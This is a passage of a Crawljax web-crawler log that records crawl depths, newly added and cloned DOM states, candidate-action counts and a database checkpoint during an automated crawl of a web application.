[pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state49 added to the StateMachine. 597302 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 597328 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 19 states with unfired actions 599906 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 601241 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 602717 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state50 added to the StateMachine. 602718 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 602742 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 20 states with unfired actions 604659 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state51 added to the StateMachine. 604660 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 604732 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 20 states with unfired actions 607294 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 608605 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 610005 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 611545 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state52 added to the StateMachine. 611545 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 611616 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 20 states with unfired actions 614189 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 615475 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 616912 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 618304 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state53 added to the StateMachine. 618305 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 618350 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 20 states with unfired actions 620830 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 622163 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 623568 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 625747 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state54 added to the StateMachine. 625747 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 626281 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 20 states with unfired actions 628700 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 630126 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state55 added to the StateMachine. 630126 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 2 630134 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 20 states with unfired actions 631607 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state56 added to the StateMachine. 631607 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 631647 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 21 states with unfired actions 633118 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state57 added to the StateMachine. 633118 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 633150 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 21 states with unfired actions 635689 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 637523 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 639195 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state58 added to the StateMachine. 639195 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 639301 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 22 states with unfired actions 641475 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state59 and state37 are the same. 641487 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 22 states with unfired actions 644088 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 645432 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 646785 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 648352 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state60 and state37 are the same. 648355 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 22 states with unfired actions 650911 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 652236 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 653699 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state61 added to the StateMachine. 653699 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 653754 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 23 states with unfired actions 655341 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state62 and state14 are the same. 655357 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 23 states with unfired actions 658046 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 659432 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 660846 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 662550 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state63 and state43 are the same. 662567 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 23 states with unfired actions 665338 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 666629 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 668012 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 669574 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state64 added to the StateMachine. 669574 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 669601 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 23 states with unfired actions 672141 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 673410 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 675781 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state65 added to the StateMachine. 675781 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 676252 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 24 states with unfired actions 678581 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state66 and state14 are the same. 678602 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 24 states with unfired actions 681267 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 682613 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 684358 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 687656 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state67 added to the StateMachine. 687656 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 687712 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 24 states with unfired actions 690438 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 691850 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 693578 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 695880 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state68 and state43 are the same. 695884 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 24 states with unfired actions 698661 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 699983 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 701638 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 704364 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state69 added to the StateMachine. 704364 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 704420 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 24 states with unfired actions 707017 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 708320 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 709765 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state70 added to the StateMachine. 709765 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 709841 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 25 states with unfired actions 711517 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state71 added to the StateMachine. 711517 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 711522 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 26 states with unfired actions 713070 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state72 and state7 are the same. 713089 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 25 states with unfired actions 715558 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 717242 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 718589 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 720040 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state73 added to the StateMachine. 720041 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 720079 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 25 states with unfired actions 722580 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 723970 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 725339 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 726753 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state74 added to the StateMachine. 726753 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 726788 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 25 states with unfired actions 729379 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 730720 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 732216 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 733744 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state75 and state49 are the same. 733769 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 25 states with unfired actions 736403 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 737832 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 739232 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 740786 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state76 added to the StateMachine. 740786 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 740811 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 25 states with unfired actions 743639 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 744965 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 746421 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state77 added to the StateMachine. 746421 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 746428 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 25 states with unfired actions 747922 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state78 added to the StateMachine. 747922 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 747955 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 25 states with unfired actions 750457 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 751808 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 753217 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 754682 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state79 added to the StateMachine. 754682 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 754790 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 25 states with unfired actions 757432 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 758826 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 760168 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 761708 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state80 added to the StateMachine. 761708 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 761770 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 25 states with unfired actions 764321 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 765637 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 767001 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 768669 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state81 added to the StateMachine. 768669 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 768696 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 25 states with unfired actions 771162 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 772479 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 773949 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 775531 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state82 added to the StateMachine. 775531 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 775558 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 25 states with unfired actions 778161 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 779536 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 781103 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state83 added to the StateMachine. 781103 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 781139 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 26 states with unfired actions 782936 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state84 added to the StateMachine. 782936 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 782973 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 26 states with unfired actions 783407 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint start 783408 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose start 783418 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - dataFileCache commit start 784686 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - checkpointClose end 784688 [HSQLDB Timer @ba5d1a4] INFO hsqldb.db.HSQLDB379AF3DEBD.ENGINE - Checkpoint end 785801 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 787001 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 788221 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 789521 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state85 added to the StateMachine. 789522 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 789538 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 26 states with unfired actions 791834 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 793037 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 794410 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state86 added to the StateMachine. 794410 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 794453 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 795945 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state87 added to the StateMachine. 795945 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 795958 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 28 states with unfired actions 797287 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state88 added to the StateMachine. 797287 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 5 797295 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 799579 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 800799 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 802078 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 803562 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state89 and state37 are the same. 803566 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 805849 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 807074 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 808373 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 811290 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state91 added to the StateMachine. 811290 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 811337 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 27 states with unfired actions 813644 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 814878 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 816226 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state92 added to the StateMachine. 816226 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 816251 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 28 states with unfired actions 817589 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state93 and state14 are the same. 817600 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 28 states with unfired actions 819914 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 821151 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 822388 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 823756 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state94 added to the StateMachine. 823757 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 823775 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 28 states with unfired actions 826127 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 827372 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 828621 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 829955 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state95 and state14 are the same. 829958 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 28 states with unfired actions 832351 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 833794 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 835071 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 836487 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state96 added to the StateMachine. 836488 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 836527 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 28 states with unfired actions 838874 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 840198 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 842304 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state97 added to the StateMachine. 842304 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 842642 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 844595 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state98 and state14 are the same. 844609 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 846946 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 848190 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 849645 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 851469 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state99 added to the StateMachine. 851469 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 851491 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 853917 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 855123 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 856566 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 858429 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state100 added to the StateMachine. 858429 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 858452 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 860906 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 862144 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 863606 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 865699 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state101 and state43 are the same. 865703 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 868034 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 869262 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 870786 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 873072 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state102 added to the StateMachine. 873072 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 873081 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 29 states with unfired actions 875408 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 876608 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 878012 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state103 added to the StateMachine. 878012 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 3 878037 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 879383 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state104 added to the StateMachine. 879384 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 879401 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 881731 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 882920 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 884177 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 885556 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state105 added to the StateMachine. 885556 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 885565 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 887878 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 889115 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 890371 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 891711 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state106 added to the StateMachine. 891711 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 891729 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 894020 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 895238 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 896487 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 897845 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state107 added to the StateMachine. 897845 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 897871 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 900197 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 901384 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 902657 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 904029 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - CLONE State detected: state108 and state76 are the same. 904041 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 906320 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 907530 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 908831 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 910263 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state109 added to the StateMachine. 910264 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 910286 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 912665 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 913876 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 915158 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 916583 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state110 added to the StateMachine. 916583 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 916601 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 918981 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 920195 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 921439 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 922930 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state111 added to the StateMachine. 922930 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 922961 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 925352 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 926550 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 927794 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 929350 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state112 added to the StateMachine. 929350 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 929377 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 931678 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 932903 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 934170 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 935532 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state113 added to the StateMachine. 935532 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 935548 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 states with unfired actions 937874 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 1 939073 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 2 940317 [pool-2-thread-2] INFO com.crawljax.core.Crawler - Crawl depth is now 3 941889 [pool-2-thread-2] INFO com.crawljax.core.state.StateMachine - State state114 added to the StateMachine. 941889 [pool-2-thread-2] INFO com.crawljax.core.Crawler - New DOM is a new state! crawl depth is now 4 941915 [pool-2-thread-2] INFO com.crawljax.core.UnfiredCandidateActions - There are 30 